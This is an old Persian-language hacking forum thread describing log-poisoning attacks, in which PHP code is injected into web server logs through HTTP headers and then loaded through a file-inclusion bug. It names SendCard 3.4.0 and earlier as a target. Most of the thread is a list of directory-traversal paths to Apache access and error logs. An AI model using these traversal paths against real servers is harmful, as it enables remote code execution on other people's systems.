حملات جديد CURLF INjection

**subzero_icecity** · 2006-09-25, 10:24 PM

با سلام

اين حملات تزريق كد هاي مخرب به log فايل هاي و load آنها توسط نفوذ گر ميباشد

اينم مقالش

http://forums.simorgh-ev.com/download.php?id=114

موضوعات مشابه:

**subzero_icecity** · 2006-09-25, 10:25 PM

نمونه عملي اين حمله براي باگي هست كه جهت نفوذ به : SendCard <= 3.4.0 نوشته شده (باگ را از milw0rm به دست آوريد .)

نمونه اي از جاهايي كه كد مخرب(در اينجا كد php را به صورت Refererr يا GET در پرتكل HTTP تزريق ميكند ) ، در آنجا ثبت شده و هكر قصد Include كردن آن را با استفاده از يك باگ file injection دارد .

كد: "../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../var/log/error_log

موضوع: حملات جديد CURLF INjection

پیوند

ابزارهای موضوع

نمایش

حملات جديد CURLF INjection

کلمات کلیدی در جستجوها:

حمله به access sql injection

File injection

http:forums.simorgh-ev.comdownload.phpid=114

نمونه عملی sql injection

برچسب برای این موضوع

مجوز های ارسال و ویرایش